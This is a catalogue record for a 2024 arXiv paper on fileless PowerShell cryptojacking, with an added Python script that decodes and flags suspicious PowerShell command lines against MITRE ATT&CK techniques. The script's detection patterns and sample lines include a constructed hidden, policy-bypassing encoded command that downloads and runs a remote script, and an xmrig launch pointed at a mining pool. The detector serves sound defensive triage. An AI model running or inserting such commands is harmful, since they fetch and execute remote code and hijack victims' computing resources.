
Abstract

Fileless malware predominantly relies on PowerShell scripts, leveraging the native capabilities of Windows systems to execute stealthy attacks that leave little or no trace on the victim's disk. The effectiveness of the fileless method lies in its ability to remain operational on victim endpoints through in-memory execution, even after the attack is detected and the original malicious scripts are removed. Threat actors have increasingly used this technique, particularly since 2017, to conduct cryptojacking attacks. With the emergence of new Remote Code Execution (RCE) vulnerabilities in ubiquitous libraries, cryptocurrency mining attacks have become widespread, often employing fileless techniques. This paper provides a comprehensive analysis of the PowerShell scripts used in fileless cryptojacking, dissecting their common malicious patterns and mapping them to the MITRE ATT&CK framework.
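The abstract describes the building blocks of a fileless PowerShell cryptojacking chain (an encoded command line, a download cradle, in-memory execution via Invoke-Expression, a hidden window, and a miner launch). The script below is an added example, not code from the paper, showing how a defender would triage PowerShell command lines for those patterns: it decodes a -EncodedCommand payload (UTF-16LE base64, which is the form powershell.exe expects), runs a small rule set over both the raw and decoded text, and tags each hit with the MITRE ATT&CK Enterprise technique ID it corresponds to. The regexes, the rule-to-technique mapping, the scoring threshold and the sample command lines are this example's own constructions (the hostnames use the reserved .invalid TLD); they are not the paper's indicators.

```python
"""
Heuristic triage of PowerShell command lines for fileless-cryptojacking
patterns.  Added example; the rules and samples below are constructed for
illustration and are not taken from the paper.
"""
import base64
import binascii
import re

# Captures the base64 argument to -e / -ec / -enc / -EncodedCommand.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# (rule name, MITRE ATT&CK Enterprise technique ID, pattern).
# The ID assignment is this example's choice of the closest technique.
RULES = [
    ("encoded_command", "T1027.010", ENC_RE),                                   # Command Obfuscation
    ("download_cradle", "T1105", re.compile(
        r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|wget|curl)\b", re.I)),  # Ingress Tool Transfer
    ("memory_execution", "T1059.001", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),  # PowerShell
    ("bypass_policy", "T1059.001", re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)),
    ("hidden_window", "T1564.003", re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)),   # Hidden Window
    ("miner_indicator", "T1496", re.compile(
        r"(?:xmrig|stratum\+tcp://|--donate-level|cryptonight|minerd)", re.I)),           # Resource Hijacking
]


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(line: str):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64."""
    m = ENC_RE.search(line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="ignore")


def triage_line(line: str) -> dict:
    """Run every rule over the raw line and, if present, its decoded payload."""
    hits = {}
    decoded = decode_encoded_command(line)
    for text in (line, decoded) if decoded is not None else (line,):
        for name, technique, pattern in RULES:
            if pattern.search(text):
                hits[name] = technique
    # Constructed threshold: a miner artefact alone, or two or more stacked
    # tradecraft signals, is enough to escalate for analyst review.
    suspicious = "miner_indicator" in hits or len(hits) >= 2
    return {
        "rules": sorted(hits),
        "techniques": sorted(set(hits.values())),
        "decoded": decoded,
        "verdict": "suspicious" if suspicious else "benign",
    }


# Constructed sample command lines (not real telemetry).
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1')"
SAMPLE_LINES = [
    # Hidden window, policy bypass and an encoded payload that downloads and IEX's a stage-2 script.
    "powershell.exe -w hidden -ep bypass -enc " + encode_powershell(INNER),
    # Ordinary administration, should stay benign.
    "powershell.exe -Command Get-Service -Name Spooler | Select-Object Status",
    # Plain-text miner launch pointing at a stratum pool.
    "powershell -c \"Start-Process xmrig.exe -ArgumentList '-o stratum+tcp://pool.example.invalid:3333'\"",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        result = triage_line(line)
        print(result["verdict"], result["techniques"], result["rules"])
```

Scanning the decoded payload as well as the raw line is the step that matters: the first sample exposes its download cradle and Invoke-Expression only after the -enc argument is decoded, which is exactly the obfuscation layer that lets these scripts slip past command-line string matching.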

Details

Identifier / keyword
1009240
Title
The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell Scripts
Publication title
arXiv.org; Ithaca
Publication year
2024
Publication date
Feb 21, 2024
Section
Computer Science
Publisher
Cornell University Library, arXiv.org
Source
arXiv.org
Place of publication
Ithaca
Country of publication
United States
University/institution
Cornell University Library arXiv.org
e-ISSN
2331-8422
Source type
Working Paper
Language of publication
English
Document type
Working Paper
Publication history
Online publication date
2024-02-22
Milestone dates
2024-01-15 (Submission v1); 2024-02-21 (Submission v2)
First posting date
22 Feb 2024
ProQuest document ID
2930092111
Document URL
https://www.proquest.com/working-papers/pulse-fileless-cryptojacking-attacks-malicious/docview/2930092111/se-2?accountid=208611
Copyright
© 2024. This work is published under http://arxiv.org/licenses/nonexclusive-distrib/1.0/ (the “License”). Notwithstanding the ProQuest Terms and Conditions, you may use this content in accordance with the terms of the License.
Last updated
2024-02-23
Database
ProQuest One Academic